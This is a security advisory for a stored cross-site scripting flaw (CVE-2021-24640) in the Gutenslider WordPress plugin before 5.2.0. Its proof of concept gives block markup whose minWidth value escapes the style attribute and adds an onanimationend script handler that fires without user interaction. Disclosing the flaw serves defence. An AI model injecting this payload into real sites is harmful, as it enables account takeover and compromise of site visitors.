Gutenslider < 5.2.0 – Contributor+ Stored XSS | CVE 2021-24640

Description

The plugin does not escape the minWidth attribute of a Gutenburg block, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks

Proof of Concept

As a contributor (or above), create/edit a post, put the below code while in Code Editor mode, and view/preview the post (The payload is specific to the TwentyTwentyOne theme and will trigger without user interaction, but could be changed)

<!-- wp:eedee/block-gutenslider {"gsBlockId":"fzk82qf0m"} -->
<!-- wp:eedee/block-gutenslide {"background":{"backgroundType":"color","backgroundOverlayImage":"","backgroundOverlayVideo":"","backgroundOverlayOpacity":50,"backgroundGradient":{},"backgroundImage":{},"backgroundPosition":"center center","backgroundRepeat":"no-repeat","backgroundImageSize":"cover","backgroundVideoSize":"cover","customBackgroundColor":"","hasParallax":false,"backgroundFocalPoint":{"x":0.5,"y":0.5},"backgroundVideoFocalPoint":{"x":0.5,"y":0.5},"backgroundVideo":{},"backgroundVideoMuted":true,"backgroundVideoLoop":true,"backgroundVideoAutoplay":true,"openPopover":true,"backgroundColor":"white"},"minWidth":"100px;animation-name:twentytwentyone-close-button-transition;\u0022 onanimationend=\u0022alert(origin)//"} -->
<!-- wp:paragraph {"align":"center","placeholder":"Add slide content here","className":"gutenslider-content-initial","fontSize":"larger"} -->
<p class="has-text-align-center gutenslider-content-initial has-larger-font-size">Slider AAAA</p>
<!-- /wp:paragraph -->
<!-- /wp:eedee/block-gutenslide -->
<!-- /wp:eedee/block-gutenslider -->